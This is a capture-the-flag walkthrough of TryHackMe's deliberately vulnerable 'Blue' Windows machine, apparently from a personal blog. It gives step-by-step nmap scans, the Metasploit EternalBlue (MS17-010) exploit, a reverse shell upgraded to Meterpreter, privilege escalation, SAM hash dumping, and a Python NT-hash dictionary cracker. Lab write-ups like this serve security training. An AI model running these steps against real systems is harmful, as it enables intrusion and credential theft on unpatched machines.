TryHackMe: Blue — Writeup

Danish Zia
5 min read, Apr 13, 2020


Figure 1.1 (Blue Banner)

Hi,

This article is a writeup of the Blue capture-the-flag room created by DarkStar7471 on TryHackMe. It is a free room that anyone can join after logging in to the website.

Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

This challenge shows how one small misconfiguration (here, an exposed and unpatched SMBv1 service) can get a whole machine compromised. Let’s get started.

In this challenge we are given a vulnerable machine. It can either be deployed on TryHackMe and reached over the OpenVPN connection TryHackMe provides, or downloaded and run on our own hypervisor. To deploy it, click the “Deploy” button, or follow the link in the description and download the machine from there, as shown in figure 1.2 below:

Figure 1.2

Reconnaissance on Deployed Machine:

When you deploy the machine you get 1 hour by default; you can add more time if you need it. The IP of the machine is also displayed, as shown in figure 1.3 below:

Figure 1.3

Scanning:

As we now have the machine’s IP, let’s scan it with nmap (-sV for service versions, -A for OS detection, scripts and traceroute):

nmap -sV -A 10.10.88.199

This command lists the open ports and the services behind them, as shown in figure 1.4 below:

Figure 1.4

Now that we know the open ports, let’s run nmap’s vuln script category against the machine:

nmap --script vuln 10.10.88.199

The vuln scripts (smb-vuln-ms17-010 in particular) report that the machine is vulnerable to MS17-010, the SMBv1 remote code execution bug exploited by EternalBlue, as shown in figure 1.5 below:

Figure 1.5

Now we start Metasploit and try to exploit this vulnerability with it. To launch the Metasploit console, run:

msfconsole

Figure 1.6

Now search for the MS17-010 exploit in Metasploit:

search ms17-010

Figure 1.7

Here we found an exploit module for this vulnerability; now it is time to try it.

We use the following commands to configure the exploit before running it against the target machine:

use exploit/windows/smb/ms17_010_eternalblue

Figure 1.8

Now set RHOSTS to the target IP:

set RHOSTS 10.10.88.199

Figure 1.9

Now run the “exploit” command to launch the configured exploit against the victim machine.

exploit

Figure 1.10

Our exploit ran successfully and we got a reverse shell. Now let’s upgrade it to a Meterpreter session.

To background this shell press CTRL+Z. Use the “sessions -l” command to list the active sessions and their IDs.

Then use the shell_to_meterpreter post-exploitation module, as written below and shown in figure 1.11:

use post/multi/manage/shell_to_meterpreter

set LHOST <Your_IP>

sessions -l

set SESSION 1

run

Figure 1.11

You might notice that the victim machine’s IP has changed here. That is because there was a power cut on my side and the lab time ran out, so I had to deploy the Blue machine again, which gave the victim machine a new IP.

When you run the above commands you get a Meterpreter session. List the sessions again and you will find that a Meterpreter session is active, as shown in figure 1.12 below:

sessions -l

Figure 1.12

To interact with the new Meterpreter session, use the command shown below in figure 1.13:

sessions -i 2

Figure 1.13

We are now connected to the Meterpreter session. Let’s escalate privileges with the getsystem command, then drop into a command shell and confirm with whoami that we are NT AUTHORITY\SYSTEM, as shown in figure 1.14 below:

getsystem

shell

whoami

Figure 1.14

Let’s check which processes are running on the machine with the ps command, shown in figure 1.15:

ps

Figure 1.15

Next we find the process ID that our Meterpreter session is running in, using the getpid command, as shown in figure 1.16 below:

Figure 1.16

Migrate Meterpreter into a stable process that is running as NT AUTHORITY\SYSTEM (check the User column of the ps output; such processes typically run from C:\Windows\System32\). Dumping hashes needs SYSTEM-level access to the SAM, and living inside a long-running system process is far more reliable than the process the exploit landed in. To migrate, use the command below:

migrate <process_id>

Now, to dump the password hashes stored in the SAM, use the command shown in figure 1.17 below:

hashdump

Figure 1.17

Copy these hashes into a file and run John the Ripper on it (with --format=NT, since the fourth field of each line is an NTLM hash) to crack the password.
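To make the cracking step concrete, here is an added Python example (not code from the original writeup) that parses hashdump-style lines, flags accounts with no LM hash or an empty NT password, and runs a small dictionary attack by recomputing NT hashes, i.e. MD4 over the UTF-16LE password, implemented in pure Python because hashlib’s md4 is disabled on many modern OpenSSL builds. The dump lines and wordlist are constructed sample data, not the room’s real hashes; in practice you would hand the file to john --format=NT or hashcat -m 1000 with a real wordlist.

```python
import struct

# Well-known hashes of the empty password. In a dump, the LM value means
# "no LM hash stored" (LM disabled, the default on modern Windows) and the
# NT value means the account really has an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, implemented here so it runs where OpenSSL has no legacy MD4."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = _rotl(a + _f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, words taken column-wise
            k = (i % 4) * 4 + i // 4
            a = _rotl(a + _g(b, c, d) + x[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl(a + _h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK32, (b0 + b) & MASK32,
                          (c0 + c) & MASK32, (d0 + d) & MASK32)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). Unsalted, so one hash per guess covers every user."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str):
    """Parse 'user:rid:lm:nt:::' lines in the format Meterpreter's hashdump prints."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt,
                        "lm_stored": lm != EMPTY_LM, "empty_password": nt == EMPTY_NT})
    return entries


def crack_nt(entries, wordlist):
    """Dictionary attack: hash each candidate once (empty password always tried), match every NT hash."""
    lookup = {nt_hash(w): w for w in [""] + list(wordlist)}
    return {e["user"]: lookup[e["nt"]] for e in entries if e["nt"] in lookup}


# Constructed sample dump (not the room's real hashes): two accounts with an empty
# password and one with a weak dictionary password.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
SAMPLE_WORDLIST = ["123456", "password", "letmein", "Password1"]  # constructed

if __name__ == "__main__":
    dump = parse_hashdump(SAMPLE_DUMP)
    for e in dump:
        print(f"{e['user']:<14} rid={e['rid']:<5} lm_stored={e['lm_stored']} "
              f"empty_password={e['empty_password']}")
    print("cracked:", crack_nt(dump, SAMPLE_WORDLIST))
```

The point the example makes is why this step is so cheap for an attacker: NT hashes are unsalted MD4, so a single pass over the wordlist is enough to test every account in the dump at once.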

Figure 1.18

With the password cracked, 3 flags remain to be found. Instead of browsing directory by directory, we can use Meterpreter’s search command to locate the flag files, as shown in figure 1.19 below:

search -f flag*.txt

Figure 1.19

Now go to the locations of all 3 flag files and read the flags from there.

Flag1 Location:

Figure 1.20

Flag2 Location:

Figure 1.21

Flag3 Location:

Figure 1.22

Hurrah! We have completed the Blue challenge. Thanks for staying till the end.

If you liked this article, please support me on Patreon so that I can keep writing articles like this.
